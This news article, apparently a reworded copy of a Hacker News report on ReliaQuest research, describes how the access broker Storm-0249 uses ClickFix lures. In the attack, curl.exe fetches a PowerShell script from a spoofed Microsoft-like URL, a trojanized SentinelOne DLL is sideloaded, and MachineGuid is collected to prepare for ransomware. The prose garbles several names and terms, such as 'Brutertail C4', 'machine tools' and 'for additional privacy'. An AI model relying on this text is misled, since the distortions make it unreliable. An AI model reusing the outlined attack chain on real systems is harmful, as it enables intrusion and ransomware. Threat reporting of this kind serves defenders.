known as threat actor storm-0249 It is likely to shift from its role as an initial access broker to adopting a combination of more advanced strategies such as domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks.
“These methods allow them to bypass security, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News.
Storm-0249 is the alias assigned by Microsoft to an early access broker that has given other cyber crime groups, including ransomware and extortion actors like Storm-0501, a foothold in organizations. It was first revealed by the tech giant in September 2024.
Then, earlier this year, Microsoft also revealed details of a phishing campaign run by a threat actor that used tax-related topics to target users in the US ahead of tax filing season and infected them with the Latrodectus and Brutertail C4 (BRC4) post-exploit frameworks.
The ultimate goal of these infections is to gain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets and accelerating the pace of such attacks.
ReliaQuest’s latest findings demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to cause potential targets to run malicious commands through the Windows Run dialog under the pretext of solving a technical issue.
In this case, the copy and execute command leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics the Microsoft domain to give victims a false sense of confidence (“sgcipl[.]com/us.Microsoft.com/bdo/”) and execute it in a fileless manner via PowerShell.
This results in the execution of a malicious MSI package with system privileges, which drops a trojanized DLL associated with SentinelOne’s Endpoint Security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable.
In doing so, the idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby rendering the activity undetectable. The DLL then establishes encrypted communications with a command-and-control (C2) server.
Storm-0249 has also been observed using legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers such as MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LOTL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means that the activity is unlikely to raise any red flags.
The findings indicate a shift away from large-scale phishing campaigns toward precise attacks that weaponize the trust associated with signing processes for additional privacy.
“This isn’t just general reconnaissance – it’s preparation for ransomware allies,” ReliaQuest said. “Ransomware groups like Lockbit and ALPHV use machine tools to bind encryption keys to individual victim systems.”
“By linking the encryption keys to the machine’s keys, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt the files without the attacker-controlled key.”
